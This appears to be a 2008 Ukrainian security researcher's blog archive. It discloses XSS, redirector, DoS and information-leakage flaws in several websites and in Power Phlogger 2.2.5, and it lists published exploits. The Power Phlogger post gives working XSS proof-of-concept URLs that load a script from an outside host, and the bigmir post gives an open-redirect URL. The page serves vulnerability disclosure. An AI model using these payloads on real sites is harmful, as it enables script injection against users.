Архів для категорії 'Уразливості'

Уразливості на dnevnik.bigmir.net

23:57 21.06.2008

Ще в позаминулому році, 28.09.2006, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://dnevnik.bigmir.net. І ці уразливості як були довгий час на сервісі блогів Бігміра до вказаної дати, так й залишилися після неї - вони по сьогодні так і не були виправлені. Лише після початку використання WAF (з осені минулого року) на Бігмірі, можливості використання даних уразливостей зменшились, але самі дірки так і не були виправлені ;-) .

Що відповідним чином характеризує даний блог-сервіс, як й інші сервіси блогів, де я регулярно знаходжу уразливості. Останніми я згадував уразливості на livejournal.com та на blog.i.ua.

XSS (через HTTP Response Splitting):

Дана XSS уразливість вже не працює (в зв’язку з WAF).

Redirector:

http://dnevnik.bigmir.net/go/?url=http://websecurity.com.ua

Добірка уразливостей

16:33 21.06.2008

В даній добірці уразливості в веб додатках:

Уразливості на www.skyse.ru

19:34 20.06.2008

19.02.2008

У липні, 15.07.2007, я знайшов Cross-Site Scripting уразливості, в тому числі і Persistent XSS, на проекті http://www.skyse.ru (мета пошукова система). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.06.2008

XSS:

XSS (Persistent):

Дані уразливості вже виправлені.

Добірка уразливостей

20:39 19.06.2008

В даній добірці уразливості в веб додатках:

Уразливості на exchengine.ru

22:43 18.06.2008

13.02.2008

У липні, 12.07.2007, я знайшов Cross-Site Scripting уразливості на проекті http://exchengine.ru (сервіс обміну веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно обмінників веб грошей я писав про уразливість на onlinechange.com.

Детальна інформація про уразливості з’явиться пізніше.

18.06.2008

XSS:

Дані уразливості вже виправлені.

Добірка уразливостей

17:55 17.06.2008

В даній добірці уразливості в веб додатках:

Уразливість на shop.a.ua

20:17 16.06.2008

11.02.2008

У липні, 11.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://shop.a.ua (пошук інтернет-магазинів порталу A.UA). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів A.UA я писав про уразливості на ref.a.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.06.2008

XSS:

Дана уразливість досі не виправлена.

Нові уразливості в Power Phlogger

23:57 14.06.2008

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 17.05.2008 та 31.05.2008, я виявив Denial of Service, Information Leakage та Cross-Site Scripting уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

DoS:

http://site/newaccount_self.php

Скрипт редиректить сам на себе (зациклений редирект). Mozilla автоматично зупиняє даний зациклений редирект (видає Redirect Loop Error), а IE - ні (продовжує звертатися до сервера). Якщо клієнт, що звертається до скрипта, сам не зупинить редирект, наприклад бот пошукових систем, то це спричинить велике навантаження на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/dspStats.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/edCss.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

Дані XSS можливі в зв’язку з використанням в скриптах $PHP_SELF.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це шоста частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Добірка уразливостей

16:17 14.06.2008

В даній добірці уразливості в веб додатках:

  • Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities (деталі)
  • POWER PHLOGGER v.2.2.5 (username) SQL Injection (деталі)
  • Flashbb <= 1.1.7 - Remote File Inclusion Exploit (деталі)
  • Entertainment CMS Admin Login Bypass (деталі)
  • SYSTONY’Cfr/portal/ actualites.asp sql injection (деталі)
  • Infinity Solutions LLC e/description.asp sql injection (деталі)
  • MERCURY/Templates mercury.ASP SQL Injection (деталі)
  • Another You tube clone script vulnerability (деталі)
  • CodeIgniter 1.5.3 vulnerabilities (деталі)
  • Cross-Site Request Forgery (CSRF) vulnerability in Jportal 2.3.1 (деталі)

Уразливість на www.einnews.com

20:08 13.06.2008

18.07.2007

У липні, 08.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.einnews.com - пошуковцю та агрегатору новин. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

13.06.2008

XSS:

Дана уразливість вже виправлена.